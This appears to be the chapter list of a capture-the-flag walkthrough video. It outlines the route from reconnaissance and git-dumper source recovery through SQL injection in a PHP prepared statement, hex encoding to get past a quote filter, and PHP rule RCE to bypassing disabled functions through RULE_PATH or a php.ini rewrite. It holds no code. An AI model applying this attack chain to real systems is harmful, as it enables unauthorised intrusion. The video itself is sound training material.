00:00 - Introduction 00:30 - Start of nmap 02:00 - Discovering .git directory, using git-dumper to download source code 05:50 - Using OpenGrep to identify vulnerabilities and discovering an SQL Injection in the Prepared Statement 08:30 - Going over this weird SQL Injection in PHP MySQL Prepared Statements, which is an odd scenario of having control over the column name in the query 11:00 - Creating the SQL Injection Payload in the prepared statement 18:40 - We can't use a ascii quote, but can hex encode to get around the limitation 23:50 - Cracking the hash and getting admin on the application 26:00 - Looking at the admin functionality, discovering rules can contain PHP which will get us RCE 30:00 - Shell on the box 33:30 - Discovering the gavel-util and gaveld binary, copying them to our box 36:30 - Opening the binaries up in Ghidra 41:30 - Doing some dynamic analysis on our box, running gavil-util to see what it writes to the socket 44:30 - Setting the environment variable RULE_PATH to change where gaveld loads the PHP Configuration from so we can bypass the disabled functions 50:15 - Showing another way we could exploit this, using PHP to rewrite the PHP.INI removing the disabled functions.
Trust cues for videos
Clips curated by TrustOps carry the Curated label. External embeds link out to the original publishers.